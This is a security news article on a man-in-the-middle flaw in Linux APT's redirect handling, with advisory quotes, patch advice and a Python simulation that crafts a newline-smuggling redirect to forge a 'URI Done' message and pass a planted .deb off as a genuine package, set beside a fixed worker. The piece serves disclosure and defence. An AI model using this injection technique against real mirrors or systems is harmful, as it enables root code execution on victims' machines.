Critical vulnerability in Linux apt-get on Debian, Ubuntu and Mint distros


APT, one of the major Linux software installation programs, presents a serious security flaw

Users who want to install programs on Linux distributions such as Debian, Ubuntu or Mint usually do so through the main software installation program, the Advanced Package Tool (APT). Although it works well under normal conditions, network security and ethical hacking experts from the International Institute of Cyber Security report a newly published method for mounting a man-in-the-middle attack on APT.

Worse, the people in charge of this investigation believe that the security hole lets an attacker on the network path execute arbitrary code, as root, on any system that installs or upgrades any package through APT.

According to experts in network security, APT is a front end for the dpkg packaging system. A packaging system, in turn, is a database of "packages", the sets of files that must be installed for a program, Firefox for example, to run. With APT you can find and install new programs, update programs, remove programs and refresh the local dpkg databases.

Everything sounds good so far, but the problems are about to begin. When APT installs a new program or updates one already installed, it does not sanitize the redirect target a mirror sends back for a package URI. APT fetches files through a separate transport worker (the http method) that talks to the main apt process over a newline-delimited text protocol; the worker URL-decodes the redirect target and copies it into its reply, so an attacker who embeds encoded newlines in the redirect can inject a forged "URI Done" message, including the file hashes (SHA-256 and the like) that the main process then compares with the values listed in the GPG-signed package index. The main process trusts the hashes the worker reports rather than recomputing them, so an attacker who controls those reported hashes can make a malicious package look legitimate.

In a security alert, Ubuntu states: "Since version 0.8.15, APT decodes the destination URLs of redirects, but does not check for new lines, allowing a MiTM attacker to inject arbitrary headers into the returned result. If the URL embeds the hashes of the so-called file, it can be used to disable any validation of the downloaded file, because the false hashes will be included in front of the correct hashes," the distribution's notice concludes.

The investigators demonstrated that they could plant a malicious .deb on a target system by serving it in place of the Release.gpg file. That file is always downloaded when APT refreshes its package lists and is stored at a predictable location on disk, so the forged "URI Done" message can later point APT at the planted file as if it were the requested package, commented experts in network security.
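The two steps above (a redirect whose URL-encoded newlines forge a "201 URI Done" message carrying the expected hashes, and a Filename that points at a .deb planted earlier where Release.gpg is stored) can be simulated end to end. The following Python is an added example written for this article, not code from APT or from the researchers; it models the worker-to-main-process message format on the documented apt method protocol, but the URIs, the on-disk path, the package bytes and both worker implementations are illustrative assumptions, and the model rejects newlines in the decoded target the way the fix does.

```python
from __future__ import annotations

import hashlib
from urllib.parse import quote, unquote

# Constructed sample data (not real archive content): the package the signed
# index describes, and the one the attacker wants installed in its place.
GENUINE_DEB = b"genuine package contents"
MALICIOUS_DEB = b"attacker-controlled package contents"
SIGNED_INDEX_SHA256 = hashlib.sha256(GENUINE_DEB).hexdigest()

# Where the attacker's .deb already sits on disk, delivered earlier in place of
# Release.gpg during the package-list refresh. Path and URI are illustrative.
PLANTED_PATH = "/var/lib/apt/lists/partial/mirror.example_dists_stable_Release.gpg"
FAKE_DISK = {PLANTED_PATH: MALICIOUS_DEB}
PACKAGE_URI = "http://mirror.example/pool/main/f/foo/foo_1.0_amd64.deb"


def craft_malicious_location(expected_sha256: str) -> str:
    """Attacker side: a redirect Location whose %0A-encoded newlines, once the
    worker URL-decodes them, end the '103 Redirect' message and start a forged
    '201 URI Done' that reports the hash the signed index expects."""
    injected = (
        f"{PACKAGE_URI}\n"
        "\n"
        "201 URI Done\n"
        f"URI: {PACKAGE_URI}\n"
        f"Filename: {PLANTED_PATH}\n"
        f"Size: {len(MALICIOUS_DEB)}\n"
        f"SHA256-Hash: {expected_sha256}\n"
    )
    return quote(injected, safe=":/")  # newlines become %0A, spaces %20


def worker_reply_vulnerable(location: str) -> str:
    """Model of the pre-fix http worker: decodes the redirect target and writes
    it into its newline-delimited reply without checking for embedded newlines."""
    new_uri = unquote(location)
    return f"103 Redirect\nURI: {PACKAGE_URI}\nNew-URI: {new_uri}\n\n"


def worker_reply_fixed(location: str) -> str:
    """Model of the fixed worker: refuse any decoded target containing a line
    break, so a redirect can never terminate or start a protocol message."""
    new_uri = unquote(location)
    if "\n" in new_uri or "\r" in new_uri:
        raise ValueError("redirect target contains a line break; refusing it")
    return f"103 Redirect\nURI: {PACKAGE_URI}\nNew-URI: {new_uri}\n\n"


def parse_messages(stream: str) -> list[dict]:
    """Split the worker stream into messages: blank-line separated blocks whose
    first line is a status code and whose remaining lines are 'Field: value'."""
    messages = []
    for block in stream.split("\n\n"):
        if not block.strip():
            continue
        status, *lines = block.split("\n")
        fields = {}
        for line in lines:
            key, _, value = line.partition(": ")
            fields[key] = value
        messages.append({"status": status, **fields})
    return messages


def main_process_install(stream: str) -> tuple[bool, bytes | None]:
    """Model of the main apt process: on the first '201 URI Done' it trusts the
    hash the worker reported, compares it with the signed index and, on a
    match, takes the file named in Filename. It never rehashes that file."""
    for msg in parse_messages(stream):
        if msg["status"] == "201 URI Done":
            if msg.get("SHA256-Hash") == SIGNED_INDEX_SHA256:
                return True, FAKE_DISK.get(msg.get("Filename"))
            return False, None
    return False, None


if __name__ == "__main__":
    location = craft_malicious_location(SIGNED_INDEX_SHA256)
    accepted, data = main_process_install(worker_reply_vulnerable(location))
    print("vulnerable worker: accepted =", accepted,
          "| installed attacker bytes =", data == MALICIOUS_DEB)
    try:
        worker_reply_fixed(location)
    except ValueError as err:
        print("fixed worker:", err)
```

The vulnerable path installs the attacker's bytes even though their real SHA-256 never matched the signed index, because the check ran against a hash the attacker wrote into the stream; the fixed worker stops the attack at the decoding step, before any forged message can reach the main process.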

Yves-Alexis Perez, a member of the Debian security team, said: "this vulnerability could be exploited using a man-in-the-middle attack between APT and a mirror to inject malicious content into the HTTP connection. This content could then be recognized by APT as a valid package and later used for code execution with root privileges on the compromised system."

The update patches for Debian and Ubuntu are already available, while the Mint distro has mentioned that their patches will be ready as soon as possible.

This vulnerability should not cause problems for users as long as they update their systems promptly. One caveat matters here: the fix is itself delivered through APT, so the Debian and Ubuntu advisories recommend fetching and installing it with HTTP redirects disabled for that one run (the Acquire::http::AllowRedirect option set to false); otherwise an attacker on the network path could exploit the flaw during the very upgrade meant to close it. It is recommended to install the updates as soon as possible, since it is highly likely that this vulnerability will be exploited in the wild, said experts in cybersecurity.